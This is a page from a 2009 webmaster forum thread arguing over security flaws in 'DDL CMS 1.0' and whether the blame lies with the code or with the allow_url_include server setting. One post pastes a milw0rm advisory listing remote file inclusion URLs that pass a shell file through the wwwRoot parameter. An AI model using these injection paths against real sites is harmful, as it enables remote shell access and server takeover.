Results 11 to 20 of 70
-
24th Sep 2009, 10:15 AM #11(╯?□?)╯︵ ┻━┻Website's:
Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.comLittle Dragon im not "bashing" or whatever you want to call it.
I'm just stating that, genuinly and truthfully, it is full of exploits. Not my problem if you can't find them yourself.
-
24th Sep 2009, 11:12 AM #12BannedWebsite's:
Dev-Security.netJmZ you can not expect one to be perfect in all for example lets take a Police Officer his main task is to protect us and then we have the hacker which does illegal use of the pc
now the polie officers thoughts and ideas are beyond the scope of hacking methodology
so he decides to make a script and publishes and there is a exploit in it should we blame him for the lack of him not know hacking methodology?
no we should not we all specialize in different aspects of life Little Dragon might be good at this as you might good at something else does that make you better or not? that's reportorial btw.
-
24th Sep 2009, 01:59 PM #13(╯?□?)╯︵ ┻━┻Website's:
Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.comStrange example, but dragon should know how to remove examples.
So it isn't really relevant.
Anyway, as I said in my previous post and every other relevant post, i'm posting facts, nothing related to little dragon himself.
-
24th Sep 2009, 05:56 PM #14MemberWebsite's:
zomgbbqpizza.com evilddl.com scenemarket.org
-
24th Sep 2009, 06:00 PM #15BannedWebsite's:
FusionWarez.info SmokeHost.net Leechers.coDefinently looking forward to it Little Dragon
. I'm even loving version 1.0 which means the next version will rock.
-
24th Sep 2009, 08:15 PM #16MemberWebsite's:
ddlcms.com xsaimex.com warezgod.com@ William: Thanks for the report bro. It has been forwarded to the dev. team to see if it is an issue and if it is, it will be addressed and fixed.
Edit: It appears that the exploit you reported is not an exploit of the script itself, but rather, a server setting, namely, allow_url_include.If you aren't trying to bash my script, then what are you trying to do? Help me? Like the others who have provided useful information and have given me suggestions and such? Who are you trying to fool? No one on this board I bet (except yourself).
If a server has allow_url_include set to "On", that is a security risk, for any script. Here is the response from the dev team:
"if they've got allow_url_include turned on, this is a huge problem. The script really can't be responsible for their misconfigurations.
This exploit for misconfigured servers has been removed in the latest release of
this script. "
So, even if a server is misconfigured, the script still blocks the so-called exploit, so it's been fixed alreadyThanks for the heads up though, I love it when people try to help, so it's much appreciated William!
So, Jmz, what's your point? What are you trying to accomplish? Nevermind, dont' bother answering, I'm sick of seeing your ignorant replies to my work.
I'd rather hear from people like William who actually try to HELP me and everyone else out with the development of this script. If you don't want to help, then once again I say, go find something productive to do.
Yeah, right. [JmZ, do me a favour and hover your mouse cursor over this smiley]
DEViANCE, thanks for the comments. Well said bro
Thanks CyberHack, that's the goal. It will indeed rock!
-
25th Sep 2009, 08:17 AM #17(╯?□?)╯︵ ┻━┻Website's:
Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.comI love it when I get quoted so many times.
I posted here saying it contains exploits, because it does.
As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
-
25th Sep 2009, 08:20 AM #18Member
^well said, exactly what i was thinking but was going to stay out of this
-
25th Sep 2009, 08:30 AM #19MemberWebsite's:
zomgbbqpizza.com evilddl.com scenemarket.orgThat makes sence but are there any servers that actually have that setting on??
I don't like the way it is using a number to count the path (or however it works), and even worse that it is hardcoded.. it seems like a strange method.
But back to that exploit here it is:
Code:+============================================================+ | | | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities | | | +============================================================+ | | | Author : HxH | | | | E-Mail : HxH[at]live[dot]at | | | +------------------------------------------------------------+ | | | Script : http://www.ddlcms.com/DDLCMS_v1.0.zip | | | +------------------------------------------------------------+ | | | Exploit : | | | | /header.php?wwwRoot=[Shell.txt?] | | | | /submit.php?wwwRoot=[Shell.txt?] | | | | /submitted.php?wwwRoot=[Shell.txt?] | | | | /autosubmitter/index.php?wwwRoot=[Shell.txt?] | | | +============================================================+ | | | Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members | | | +============================================================+ # milw0rm.com [2009-09-21]
Seriously though if we all work together and try and fix any problems the script will be great.
-
25th Sep 2009, 08:44 AM #20(╯?□?)╯︵ ┻━┻Website's:
Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.comDEViANCE: PHP 5.3 has it disabled by default i think, 5.2 or 5.1 may have it enabled. PHP4 doesn't even have the option as far as I know, meaning all PHP4 servers are vulnerable I suppose.
As for working together to fix the problems, it's his script and his responsibility. It's just a script, the coders can and will fix it themselves (eventually).
Sponsored Links
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Similar Threads
-
Help with DDLCMS
By Darkstar in forum Forum and DDL DiscussionReplies: 11Last Post: 23rd May 2011, 07:54 AM -
DDLCMS 3.2 help
By FuBu in forum Forum and DDL DiscussionReplies: 2Last Post: 16th Apr 2011, 02:52 PM -
help with ddlcms!
By cyber-cliff in forum Technical Help Desk SupportReplies: 5Last Post: 18th Feb 2011, 04:14 PM -
DDLCMS Someone help?
By lonerunner in forum Forum and DDL DiscussionReplies: 18Last Post: 18th Nov 2009, 01:20 AM
themaCreator - create posts from...
Version 3.45 released. Open older version (or...